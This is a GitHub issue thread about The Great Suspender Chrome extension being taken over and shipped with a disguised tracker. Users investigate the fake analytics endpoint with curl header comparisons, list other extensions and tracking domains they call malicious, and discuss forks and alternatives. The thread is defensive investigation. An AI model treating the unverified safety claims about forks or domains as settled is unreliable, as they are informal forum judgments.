I ended up just makeing my own version from before the new maintainer took over, see: https://github.com/wylie39/Thesuspender

I tried to submit it to the Webstore but got denied because it was too similar.

Picking this back up – I went back to the owa.tracker-combined-latest.minified.js that was loaded by v7.1.8 of the extension, and found more definitive evidence that this is indeed _not_ Open Web Analytics, but another application trying to pass for it.

Inspecting the response headers, rather than the actual script:

$ curl -I 'https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=7.1.8'
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 05 Jan 2021 22:21:49 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Set-Cookie,Content-Type
Set-Cookie: sjkid=679c4ee0-4fa4-11eb-aa0b-9d2325fcbc69; Path=/; Expires=Mon, 13 Nov 2023 14:21:49 GMT; Secure; SameSite=None
Allow: GET
Vary: Accept-Encoding
Via: 1.1 vegur

Massive red flags: X-Powered-By: Express (served by Node.js), and setting a sjkid cookie. OWA is PHP-based, and doesn’t set any cookies when serving its tracker script.

$ curl -I http://www.openwebanalytics.com/wp-content/plugins/owa/modules/base/js/owa.tracker-combined-min.js
HTTP/1.1 200 OK
Date: Tue, 05 Jan 2021 22:27:37 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade
Last-Modified: Wed, 13 May 2020 01:41:52 GMT
ETag: "12bf6-5a57daf375e4c"
Accept-Ranges: bytes
Content-Length: 76790
Cache-Control: max-age=2592000
Expires: Thu, 04 Feb 2021 22:27:37 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: application/javascript

There are valid reasons for some headers to differ when serving static files, but not those headers. To corroborate all of this I also loaded the extension in a sandboxed Chrome and inspected its fake tracking pixel requests. The request to log.php looks like what a normal OWA client would send, but the response doesn’t match what the OWA backend is meant to serve.

curl -I 'https://cdn.owebanalytics.com/log.php?owa_timestamp=1609886290&owa_event_type=base.page_request&owa_visitor_id=1609886217541603325&owa_fsts=1609886217&owa_dsfs=0&owa_last_req=1609886217&owa_session_id=1609886217488590504&owa_nps=1&owa_dsps=0&owa_medium=direct&owa_source=%28none%29&owa_search_terms=%28none%29&owa_session_referer=%28none%29&owa_page_url=chrome-extension%3A%2F%2Fgkgkjnibjgollfdknieejhejimddigep%2F_generated_background_page.html&owa_HTTP_REFERER=&owa_page_title=&owa_site_id=&' \
  -H 'Connection: keep-alive' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4379.0 Safari/537.36' \
  -H 'Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8' \
  -H 'Sec-Fetch-Site: none' \
  -H 'Sec-Fetch-Mode: no-cors' \
  -H 'Sec-Fetch-Dest: image' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sjkid=84211c60-4fa6-11eb-a0f4-45a5ca107f8d' \
  --compressed
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 05 Jan 2021 22:43:10 GMT
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Set-Cookie,Content-Type
Via: 1.1 vegur

curl -I 'http://www.openwebanalytics.com/wp-content/plugins/owa/log.php?owa_timestamp=1609883437&owa_event_type=base.page_request&owa_user_name=&owa_page_type=Search+Results&owa_page_title=Search+Results+for+%22node%22&owa_visitor_id=1609882775092400392&owa_fsts=1609882775&owa_dsfs=0&owa_last_req=1609882859&owa_session_id=1609882775856888878&owa_nps=0&owa_dsps=0&owa_medium=direct&owa_source=%28none%29&owa_search_terms=%28none%29&owa_session_referer=%28none%29&owa_site_id=b07455aa2c46698dbb2d053f96447dfb&owa_page_url=http%3A%2F%2Fwww.openwebanalytics.com%2F%3Fs%3Dnode&owa_HTTP_REFERER=http%3A%2F%2Fwww.openwebanalytics.com%2Fabout%2F&' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' \
  -H 'Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8' \
  -H 'Referer: http://www.openwebanalytics.com/?s=node' \
  -H 'Accept-Language: en-US,en;q=0.9,fi;q=0.8,fr;q=0.7,ja;q=0.6' \
  -H 'Cookie: owa_v=cdh%3D%3Ee888e24d%7C%7C%7Cvid%3D%3E1609882775092400392%7C%7C%7Cfsts%3D%3E1609882775%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E0; owa_s=cdh%3D%3Ee888e24d%7C%7C%7Clast_req%3D%3E1609883437%7C%7C%7Csid%3D%3E1609882775856888878%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29' \
  --compressed \
  --insecure
HTTP/1.1 200 OK
Date: Tue, 05 Jan 2021 22:42:15 GMT
Server: Apache
Content-encoding: none
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Expires: Wed, 11 Jan 2000 12:59:00 GMT
Pragma: no-cache
Upgrade: h2
Connection: Upgrade, Keep-Alive
Content-Length: 42
Last-Modified: Wed, 11 Jan 2006 12:59:00 GMT
Vary: User-Agent
Keep-Alive: timeout=2, max=100
Content-Type: image/gif

And for a final quick check – looking at the real OWA’s source code, its log.php requests are meant to serve a redirect on POST requests. That makes it pretty easy to spot the fakes:

# Real OWA, redirecting as expected.
$ curl -I -X POST http://www.openwebanalytics.com/wp-content/plugins/owa/log.php
HTTP/1.1 302 Found
# Fake OWA, 200 OK.
$ curl -I -X POST https://cdn.owebanalytics.com/log.php
HTTP/1.1 200 OK

Extension shops and package managers really ought to consider the option of installing from a source repo or checking the compiled/minified checksum against something generated by AppVeyor or similar whenever that's an option.

Also google should stop automatic updates of extensions.

On Wed, Jan 6, 2021, 10:33 AM reinux notifications@github.com wrote:

Extension shops and package managers really ought to consider the option
of installing from a source repo or checking the compiled/minified checksum
against something generated by AppVeyor or similar whenever that's an
option.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-755369546,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAE6H7WKLZE34YBYCZHAZQDSYR7FXANCNFSM4TI37TGQ
.

Also google should stop automatic updates of extensions.

I think in general, automatic updates are good, but there should be a method of disabling updates for a specific extension.

Saw this on The Register site. Thanks for helping raise awareness.

Isn't this GPL/LGPL licenced software? Why doesn't some interested person clone this repository and create a new extension called "The Awesome Suspender" and relaunch it and we could maybe gain some of that trust back. Maybe some rebranding might be necessary because of copyrights. But it's not like there is a shortage of open source designers who might create a new logo for free.

Isn't that the best idea? Instead of constantly being scared that this developer will pull another malicious stunt. Of course you'd have to then put your trust in another possibly unknown third party entity that you also don't know. But perhaps if that new person/company is communicative and makes the right steps forward, trust can be gained back.

You already have zero trust right now, so even if I clone the repo, you can at least look at my work online, see my history in google etc, email me and probably I'd reply to you. Etc. etc. 1% trust is greater than 0%, right?

@christhomas unfortunately google has declined a few people's submissions as it's "too similar". not including malware is a massive difference tho if you ask me

@christhomas And even if posting a clean fork to Google Web Store was allowed by Google, that would not be of much help to the million+ current users unaware of the situation and still blindly trusting the old extension

In an ideal dream world, there'd be a way to link an extension/app/gadget to its associated repo, and it's _really hard_ to unlink them.
Once linked, the ONLY way to push a release is through the repo.
. . Not sure how practical that would be, but it's a thought.

In an ideal dream world, there'd be a way to link an extension/app/gadget to its associated repo, and it's _really hard_ to unlink them.
Once linked, the ONLY way to push a release is through the repo.
. . Not sure how practical that would be, but it's a thought.

this would be easily possible but the problem is:
1) Not all extensions want to be OS
2) You can send a release with code not built from the repo

this would be easily possible but the problem is:
1) Not all extensions want to be OS
2) You can send a release with code not built from the repo

😔
Yeah, it definitely wasn't a fleshed out thought, but it at the very least makes it harder to slip them past other maintainers

Isn't this GPL/LGPL licenced software?

That's... a good point, actually. This extension includes code from external contributors, which means that the original author cannot have transferred the full copyright to the buyer of the extension.

Which means that the mysterious buyer is violating the license, and therefore its copyright. Which means that any of the contributors could sue the buyer, whether their identity is known or not.

That’s not a license violation unless the L/GPL was violated. If you contribute code or include other LGPL code then it’s fine.

So it depends on the circumstances. Do you know any specifics?
On 7. Jan 2021, 15:10 +0100, Sven Slootweg notifications@github.com, wrote:

Isn't this GPL/LGPL licenced software?
That's... a good point, actually. This extension includes code from external contributors, which means that the original author cannot have transferred the full copyright to the buyer of the extension.
Which means that the mysterious buyer is violating the license, and therefore its copyright. Which means that any of the contributors could sue the buyer, whether their identity is known or not.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub, or unsubscribe.

I think the violation is releasing a new version of TGS with additional
code (the tracking code) but not providing that code as required under the
GPL license.

On Thu, Jan 7, 2021 at 9:31 AM Christopher Thomas notifications@github.com
wrote:

That’s not a license violation unless the L/GPL was violated. If you
contribute code or include other LGPL code then it’s fine.

So it depends on the circumstances. Do you know any specifics?
On 7. Jan 2021, 15:10 +0100, Sven Slootweg notifications@github.com,
wrote:

Isn't this GPL/LGPL licenced software?
That's... a good point, actually. This extension includes code from
external contributors, which means that the original author cannot have
transferred the full copyright to the buyer of the extension.
Which means that the mysterious buyer is violating the license, and
therefore its copyright. Which means that any of the contributors could sue
the buyer, whether their identity is known or not.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub, or unsubscribe.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-756151579,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAE6H7RGTRQOKMXS3C73Z63SYXAUVANCNFSM4TI37TGQ
.

--

Naveen Michaud-Agrawal

Google is apparently releasing a new Manifest v3 extension API that'll kill WebRequest. Anyone know what the effect of this will be on TGS or the tracker it calls?

I'm wondering if maybe this is why they aren't bothering to remove TGS from the store, or if they genuinely just don't care -- even though it still doesn't excuse the fact that they aren't immediately taking action on something this dangerous and widespread.

Thanks for this detailed summary, everyone! Quick question that I'm hoping someone might be able to help resolve. I'm currently working on a project that forced me to have dozens of tabs open in chrome (so many moving parts). However now that Chrome has blocked The Great Suspender, all of my suspended tabs are broken since the extension is no longer enabled. I've downloaded the source code from this repo and loaded the extension unpacked (tag 7.1.6), however the tabs that were suspended are still broken due to the chrome extension namespace being different. I see there is an option to load sessions from within TGS's UI, but I don't know where or if TGS stores those sessions so that I can restore the suspended tabs with the unpacked extension. Does anyone know if this is even possible or am I SOL?

Chrome has now blocked "The Great Suspender"?

I can still search for TGS in (German) chrome web store, and add it ("Hinzufügen"):

Thanks for this detailed summary, everyone! Quick question that I'm hoping someone might be able to help resolve. I'm currently working on a project that forced me to have dozens of tabs open in chrome (so many moving parts). However now that Chrome has blocked The Great Suspender, all of my suspended tabs are broken since the extension is no longer enabled. I've downloaded the source code from this repo and loaded the extension unpacked (tag 7.1.6), however the tabs that were suspended are still broken due to the chrome extension namespace being different. I see there is an option to load sessions from within TGS's UI, but I don't know where or if TGS stores those sessions so that I can restore the suspended tabs with the unpacked extension. Does anyone know if this is even possible or am I SOL?

Having Google blocked TGS the only way I can see is extract the original URL from the TGS URL in every page (query parameter 'url', if I'm not wrong).

I was lucky to replace it this morning with a local version, all I had to do was to resume every tab with the original TGS, turn original TGS off in extensions and enable the local TGS version.

Having Google blocked TGS the only way I can see is extract the original URL from the TGS URL in _every_ page (query parameter 'url', if I'm not wrong).

Oh wow, how did I not see that in the address bar! Thank you so much, @cverond -- you're a lifesaver! 🍺 🍺 🍺

I kind of want to point out that you can probably use a plugin like URL Rewriter to do it semi-automatically if you have hundreds of tabs like I do, but that's another extension, so...

Having Google blocked TGS the only way I can see is extract the original URL from the TGS URL in _every_ page (query parameter 'url', if I'm not wrong).

If you have a lot of tabs, here's the code I wrote to make my tab manager compatible with TGS:

https://github.com/njnmco/odinochka/blob/65d7d9775c143a0c7086b8b751fbf8e9a6bd67a2/background.js#L77-L83

You can use either use the snippet directly via the console, or load the extension, save all the tabs to it, and reopen all the tabs.

I think the violation is releasing a new version of TGS with additional code (the tracking code) but not providing that code as required under the GPL license.

Indeed, that is what I am referring to.

Having Google blocked TGS the only way I can see is extract the original URL from the TGS URL in _every_ page (query parameter 'url', if I'm not wrong).

If you have a lot of tabs, here's the code I wrote to make my tab manager compatible with TGS:

https://github.com/njnmco/odinochka/blob/65d7d9775c143a0c7086b8b751fbf8e9a6bd67a2/background.js#L77-L83

You can use either use the snippet directly via the console, or load the extension, save all the tabs to it, and reopen all the tabs.

Hey, if it is ok, can I make a mini extension out of your code and publish it as something like Great Unsuspender (if I manage to figure out how chrome extensions and js works)?

function cleanTabData() {
    if(document.URL.startsWith("chrome-extension") &&
       document.URL.indexOf("/suspended.html#") > -1) {
            unsuspendurl = document.URL.substr(document.URL.lastIndexOf("&uri=")+5);
    }
    return unsuspendurl;
}

Hey, if it is ok, can I make a mini extension out of your code and publish it as something like Great Unsuspender (if I manage to figure out how chrome extensions and js works)?

Sure, feel free. You can email me if you have any questions.

To raise attention with Google, when you remove the extension, also 'Report Abuse', select 'harmful to computer/data' and in the comments reference this issue, the Register article, and/or the Lifehacker article. A few hundred reports should count as a signal to get a human to look at it.

Okay, so I made a bunch of updates to the top post, to reflect the Latest News (tm), and to help onboard people new to the issue better.

@TheMageKing The new update looks good; however, I would not recommend OneTab to people or link to it. Although it didn't execute remote code, it does have some similar (and worse) tracking / privacy issues - I mentioned this on the other GH issue.

I would also not recommended onetab for the fact that you can randomly lose
all of your tabs with no way to recover.

On Fri, 8 Jan 2021, 15:56 Neal Fultz, notifications@github.com wrote:

@TheMageKing https://github.com/TheMageKing The new update looks good;
however, I would not recommend OneTab to people or link to it. Although it
didn't execute remote code, it does have some similar (and worse) tracking
/ privacy issues - I mentioned this on the other GH issue.

—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-756832316,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AHJITPBHDSYEPIPYRROG2JDSY4TLNANCNFSM4TI37TGQ
.

So by precaution I am stopping to use the extension deployed on Chrome Store. But what about building the extension by myself and installing myself. Did anyone audit the current source code? Good or no good?

i didn't do a full audit, but looked at the git commits since the owner transfer, and i didn't see anything fishy in there.

mind my comment if you want to switch while having suspended tabs (use session buddy or some such to carry over that session).

Apparently it is already removed/deactivated for some users on chrome (possibly by region?), but the best way to let new people know is by seeing/leaving a review.

BUT the only way to get these negative reviews actually _seen_ is to rate them helpful. If you have time, go to the reviews tab, sort by recent, and mark the reviews helpful if they point out it's malware: https://chrome.google.com/webstore/detail/the-great-suspender/klbibkeccnjlkjkiokjodocebajanakg

Hopefully this prevents new people from installing the extension if it hasn't been blocked yet in their region.

While we’re at it, here is a list of related malicious extensions I’ve been putting together, in case people here are using them / want to report more:

• Auto Refresh Premium, static.trckljanalytic.com
• Stream Video Downloader, static.trckpath.com
• Custom Feed for Facebook, api.trackized.com
• Notifications for Instagram, pc.findanalytic.com
• Flash Video Downloader, static.trackivation.com
• Ratings Preview for YouTube, cdn.webtraanalytica.com

All of these have their own tracking domain set up, all serving the same fake owa.tracker-combined-latest.minified.js as described in https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-754683847.

I don’t think there is a way to batch-search the source of many extensions unfortunately, aside from Google doing it themselves. If they do I’m sure they should have no problem finding even more. The list above are only the ones I’ve confirmed to contain the same malicious code in their latest version as of today. All in all so far I found 12 extensions that seem to be maintained by this same group.

If you’re wondering how they work, someone on reddit described the type of malware/adware they got with the Ratings Preview extension. This description matches the findings from @joepie91 https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-754683847 on another (now unpublished) extension that appears to have been built by the new maintainers of TGS.

@thibaudcolas That's fantastic, thank you for sharing that. I did a writeup for the UAS compromise but I think it was a different group.

Like I wrote in my doc, more of this could get detected earlier and easier if Google allowed peer review for extensions rather than keeping it in house, where submissions often sit in the review queue for weeks. You've clearly put more effort into figuring out what the extensions actually do than they have.

Not sure if anything changed but still comes up for me in the web store (including in incognito tab just searching by name). Possibly reinstated with the version update?
https://chrome.google.com/webstore/detail/the-great-suspender/klbibkeccnjlkjkiokjodocebajanakg

Honestly, I look at the code of all extensions before I install them now, and so many of them have tracking code it's rediculous. And I'm not talking about just small amounts, many of them, the amount of tracking code exceeds the actual functionality of the extension's code.

While it won't be a permanent replacement for TGS, Chrome's new Tabs Groups Collapse Freezing seems like a pretty interesting substitute (warning still experimental and not stable for daily use yet: chrome://flags/#tab-groups-collapse-freezing)

For what it's worth, I've been running the notrack version of this plugin that I published without any reported issues since its release - on a corporate network.

Github API shows over 600 downloads so I am happy to have provided, to those who could not do without this plugin, a no-nonsense version that is without tracking or "anonymous" statistical data collection.

For what it's worth, I've been running the notrack version of this plugin that I published without any reported issues since its release - on a corporate network.

Github API shows over 600 downloads so I am happy to have provided, to those who could not do without this plugin, a no-nonsense version that is without tracking or "anonymous" statistical data collection.

Also worth noting that I included instructions, on my readme, on how to automatically install the plugin to your Windows clients via group policy.

For what it's worth, I've been running the notrack version of this plugin that I published without any reported issues since its release - on a corporate network.

Github API shows over 600 downloads so I am happy to have provided, to those who could not do without this plugin, a no-nonsense version that is without tracking or "anonymous" statistical data collection.

I definitely applaud the effort! Unfortunately, I think the vast majority won't switch over unless it's in the chrome store

I skimmed the code for the latest version and it does look like it was reverted to Google Analytics... and the analytics do appear to be correctly disabled when you check the box in preferences... My only qualm with it is that once this kind of thing happens its hard to trust them ever again...

But honestly, have you tried chrome lately without this ext? I've been running it the past few days and the built in memory management is MUCH better than it used to be. With TGS, suspended tabs seem to use about 30MB ram (without screenshots enabled)... unsuspended now in chrome they are hovering at 45MB... not great and not as good as Chromium Edge... but better than I've ever seen Chrome.

I appreciate the notrack version, but I need something easy-to-install from the Chrome Webstore as well for friends/family. Could this version be viable?

https://github.com/gioxx/MarvellousSuspender
https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa

For what it's worth, I've been running the notrack version of this plugin that I published without any reported issues since its release - on a corporate network.

Github API shows over 600 downloads so I am happy to have provided, to those who could not do without this plugin, a no-nonsense version that is without tracking or "anonymous" statistical data collection.

I appreciate the notrack version, but I need something easy-to-install from the Chrome Webstore as well for friends/family. Could this version be viable?

https://github.com/gioxx/MarvellousSuspender
https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa

@aciidic considering marvelous managed to get through you may be able to publish by calling your thing something like "notrack suspender"

I appreciate the notrack version, but I need something easy-to-install from the Chrome Webstore as well for friends/family. Could this version be viable?

https://github.com/gioxx/MarvellousSuspender
https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa

I'm really surprised they allowed it... would have to diff the extension with the original to confirm if anything has been altered but it may be. I guess the question is whether the fork and republication is permitted under the licensure terms, or if the author is just planning on reporting it and it being taken back down.

Side rant: I wish Google permitted third party repositories (aside from GPO)... As much stuff as I've found validating published extensions, the chrome store can't be much better than nothing...

IMO I will either
1) probably just pack my own .crx with known good code and sideload it for a handful of family... (i.e. no chrome store url in the manifest so it can't auto update) OR
2) setup a site monitor on the webstore page to get notified if the new publisher decides to update the extension in the future so the code can be reviewed...

Side question: has there been any indication that the new owner actually intends to ever update this? Or was it just one of those attempts to acquire a bunch of users for another reason? I suspect chrome's internal memory handling will continue to be much better given the latest changes and so hopefully one of these routes holds us over until then...

FWIW I snatched the crx (compiled extension) off the chrome webstore and it does appear to be identical to what you see on github (in the top 2 screenshots the left is the zip from github, right is the extracted crx).

I have NOT done a thorough review, of the code, but third screenshot is a diff of gsAnalytics.js from The Marvelous ext and right is from 7.1.9 of TGS that's currently on the chrome store... you can see where TGS does implement an opt out. (the GA token doesn't appear to have been changed so whoever forked it doesn't seem like this was intentional, it was just forked from a version prior to the opt out. Again I have NOT done a thorough review and the analytics may be neutered in a different part of the script and the script was included in the package is all I can say about the fork.

Side rant: I wish Google permitted third party repositories (aside from GPO)... As much stuff as I've found validating published extensions, the chrome store can't be much better than nothing...

The Chrome Extension Store is chronically under-staffed, can often take several weeks to get a review. After they turn off payment processing at the end of the month, basically admitting they will never make money on it, I hope they open it up to community peer review instead. And to be fair, addons.mozilla.org is not really any better.

For anyone looking for an alternative (and who isn't completely anti Microsoft), MS Edge is actually chromium based, and has this feature built in, it's called "sleeping tabs", and is available in Edge 88 (currently beta channel I believe). You can also now install all your other favorite extensions because they allow installing from the Chrome Web store

RE: https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-766141562 some more details on 'tab sleeping'/'tab freezing':

https://www.tenforums.com/tutorials/165231-how-enable-disable-sleeping-tabs-microsoft-edge-chromium.html

Sleeping tabs builds upon the core of Chromium’s “freezing” technology. Freezing pauses a tab’s script timers to minimize resource usage. A sleeping tab resumes automatically when clicked, which is different than discarded tabs, which require the page to fully be reloaded.

Microsoft built upon the freezing technology to create sleeping tabs. This feature allows inactive background tabs to “go to sleep,” releasing system resources after a set amount of time. These resources include both memory and CPU and can be used for new or existing tabs or other applications running on your device.

By default, Microsoft set tabs to go to sleep after two hours of inactivity. If two hours isn’t right for you, you can choose a different time interval. Tabs that are asleep will fade to let you know they’ve released resources. To resume a sleeping tab, click on it like a normal tab. The tab will un-fade and your content will be there immediately. You can also add sites you never want to sleep to a block list in Settings.

https://www.zdnet.com/article/microsoft-heres-how-edges-new-sleeping-tabs-will-save-your-laptop-battery-life/

In Chrome, tab freezing works by unloading all tabs that have been inactive for more than five minutes. This frees up CPU and RAM system resources for other tabs or other locally-running apps.

Users will be able to see if a tab is asleep because the tab will be faded. In Edge, the default is for tabs to go to sleep after two hours of inactivity but users can set a different time and set sites they never want to go to sleep in edge://settings/system.

The feature is coming soon to the Canary and Dev Channels [87.0.649.0]. Before rolling it out to Stable channel, Microsoft is looking for feedback.

https://www.howtogeek.com/444481/how-chromes-tab-freezing-will-save-cpu-and-battery/

Google is working on a new “Tab Freeze” feature for Chrome, which will pause (freeze) tabs you’re not using. That means lower CPU usage, a faster browser, and longer battery life on a laptop or convertible.

Tab freezing is different from tab discarding. When a tab is frozen, its contents stay in your system’s memory. However, the tab’s contents will be “frozen.” The web page in the tab won’t be able to use CPU or perform actions in the background. For example, let’s say you have a heavy web page open in a tab somewhere, and it’s continually running scripts. After a while, Chrome will automatically “freeze” it and stop it from performing actions until you interact with it again.

Tab Freezing is an experimental feature. It’s built into current stable versions of Chrome 77, but can only be initiated manually. In Chrome Canary builds of the upcoming Chrome 79, Chrome will be able to automatically freeze tabs just like it can automatically discard them.

In Chrome Canary, several options are available for tab freezing if you head to chrome://flags and search for “Tab Freeze.” With this option enabled, Chrome will automatically freeze “eligible” tabs after they’ve been in the background for five minutes. Depending on which option you choose, Chrome can either leave them frozen or unfreeze them for ten seconds every fifteen minutes—just enough time to sync with a server or get a bit of work done if they need it. Google is clearly testing which option is best.

The current stable version of Chrome lets you play with both features if you want to know how they work. Just type chrome://discards in Chrome’s Omnibox and press Enter.

You’ll see a diagnostic page with a list of your open tabs and whether they can be frozen or discarded. On the right side of the page, you’ll see action links to “Freeze” and “Discard” each tab.

https://www.zdnet.com/article/chrome-79-released-with-tab-freezing-back-forward-caching-and-loads-of-security-features/

For everyone lazy, can anyone in the discussion tell in short - is the latest version of this extension NOW, at the time of writing, IS of any concern to security or privacy (please, don't say something like "there is no software without privacy issues nowadays") or IS NOT?
Edge seems to keep it on their add-ons site just fine
https://microsoftedge.microsoft.com/addons/detail/the-great-suspender/engadpfihlijamplpleppgjofcmemdfe

For everyone lazy, can anyone in the discussion tell in short - is the latest version of this extension NOW, at the time of writing, IS of any concern to security or privacy (please, don't say something like "there is no software without privacy issues nowadays") or IS NOT?
Edge seems to keep it on their add-ons site just fine
https://microsoftedge.microsoft.com/addons/detail/the-great-suspender/engadpfihlijamplpleppgjofcmemdfe

1) you sound a bit annoyed there why?
2) If you are using edge, USE SLEEPING TABS AND NOT TGS.
3) If you are on any other browser, do not use TGS. They seem to have removed the malicious component but they can add it back anytime and it isn't safe. It really isn't safe. Find something else or just nothing.

Google is testing a native read-later button, which some may want to try out:

https://lifehacker.com/you-can-finally-save-articles-to-read-later-in-chrome-1846145758

Google is testing a native read-later button, which some may want to try out:

https://lifehacker.com/you-can-finally-save-articles-to-read-later-in-chrome-1846145758

That's still not more than a bookmark, very far from a tab.

While Chrome has great discarding and freezing and Edge builds upon that, neither have TGS's session management features or manual sleeping functionality. Vivaldi has similar manual tab sleeping functionality to TGS. Vivaldi also has sessions but I don't know how well it works. Unfortunately Vivaldi has many issues such as performance, and is missing some features present in Chrome. We discussed a few extensions for session management earlier. Session Buddy is the best non-TGS-based extension IMO.

FWIW, have been kind of digging into some of the memory issues I've been putting up with (that have really necessitated TGS and they seem to boil down to one of two things, which are both compounded by ad blocking:
1) websites that are excessive on third party resources (ex. when you're on a tech news site or food site and they have a few videos on the page... This is especially true if you're like me and just use a lot of cosmetic rules and not as much dynamic network filtering. And because the elements are hidden, you don't even realize they are actually on that site. Being cognizant of that, it was easy to look in the chrome task manager and find all the tabs that had subframes (iframes) and add network blocking filters on them.
2) Sites that have poorly coded(?) service-workers/XHR requests, that basically "flip out" (bad memory leaks) when you block them from being able to phone home (haven't dug TOO far in, but from what I've seen) seems like a lot of the time, blocking the spying/logging blocks the cleanup functions that occur after the phone home occurs, so they just expand in size forever. Obviously it's a bit much to figure out on every site, but played around with injecting JS to nullify their logging functions and that has definitely tamed down memory usage on certain sites (like FB for example). A combination of blocking service workers altogether (which seem like on the vast majority of sites are just used for logging) + ensuring logging functions are killed has SIGNIFICANTLY cut my memory usage in chrome. (

(Also if you use multiple profiles in chrome, enabling the "Destroy Profile on browser close" flag saves even more (and Tab Groups Collapse Freezing helps).

Sorry I know the above is probably a bit much for typical end users to do anything with, but it may help some tinkerers...

After figuring those couple things out... memory usage is about cut in half, with

While Chrome has great discarding and freezing and Edge builds upon that, neither have TGS's session management features or manual sleeping functionality. Vivaldi has similar manual tab sleeping functionality to TGS. Vivaldi also has sessions but I don't know how well it works.

Well. Vivaldi is the only modern browser that actually has tab sessions. TGS, Session Buddy and others all just have grouped bookmarks. URLs, not tabs.
The only real browser session manager otherwise is Session Manager for Firefox, which you can only use on old tech stacks with support for Firefox's ancestral addon system: Pale Moon or Waterfox. Last I tried Github didn't work nicely (which might or might not be fixable with a user agent override).
The UI for this in Vivaldi pales (no pun intended) in comparison to Session Manager, and you can't have auto-saving window sessions or other advanced setups (which might not always work on Firefox either), but it DOES persist all sorts of window-specific options:
"windowType":"normal","visibleUI":{"bookmarksBar":true,"addressBar":true,"panelToggle":false,"tabs":true,"statusBar":"on"
As well as site thumbnails, and the other features of real tab persistence: after you restore the session, back & forward history for the tab as well as scroll positions for the past and previous tabs are all there.

Unfortunately Vivaldi has many issues such as performance, and is missing some features present in Chrome.

It also has features Chrome doesn't have, like being able to style the UI. I for example made discarded tabs present differently, in both of the available vertical tab implementations.

^ Greyed out being discarded, italics being not clicked yet or notification. As you can see there's also grouped/stacked tabs (instead of full tab trees); I don't like the UI for those.

I'm not sure how atrocious performance is these days (I believe I mostly had issues with responsivity in the past, and haven't used it much in a long time).

@Luckz Yeah I've had to change my workflow so that I open new tabs instead of continuing from the current tab. It's not that bad of change. I've been using windows and virtual desktops more since then too.

@Luckz I believe that Simple Tab Groups for Firefox also supports tab unloading (and it works on recent Firefox).

Maybe we can fork The Great Suspender and take it's place in the Chrome web store. There had been cases in which a fork had practically replaced the original project that had become dysfunctional.

A similar name, something like "The private Great Suspender" can serve this purpose on the Chrome store.

@carpben that already exists and was linked above: https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa

I just got a notice saying that The Great Suspender has malware by Google Chrome itself.

I am going to use The Marvellous Suspender from the Chrome Web Store and see if that fork is safe.

Same for me, I got a malware notification for the great suspender, what is going on?

Here goes another round...

It's a shame, but I guess also a good reminder that just because something claims it's using the Open Source code doesn't mean that the binary will be based on that.

Same here. im going to install a new alternative. What do you recommend, guys? The Marvellous Suspender?

The Great Suspender was removed from the Chrome Web Store

Chrome extensions page now 404s:

https://chrome.google.com/webstore/detail/the-great-suspender/klbibkeccnjlkjkiokjodocebajanakg?hl=en

@TheCleric how is better? It has some unrelated site as a source and 0 review. It could contain even more malicious code for all we know.

It's going to suck to unsuspend all the tabs now, though.

I got a malware notification so I jumped straight in here. Any suggestions for a better alternative and the same experience?

I've tried a bunch of alternatives. The marvelous suspender is still the
only thing that solves me needs.

On Thu, Feb 4, 2021 at 10:07 AM crisflashin notifications@github.com
wrote:

Same here. Goin gto install a new alternative. What do you recommend,
guys? The Marvellous Suspender?

—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773502263,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAULCYPCMX3M4MATLKAZFKLS5LO5HANCNFSM4TI37TGQ
.

Any alternatives people?

Gonna start using The Marvellous Suspender _(source) until and unless this whole thing is settled.

Seems this keeps happening to my browser extensions. 🙄

Took Google too long to flag this as Malware.

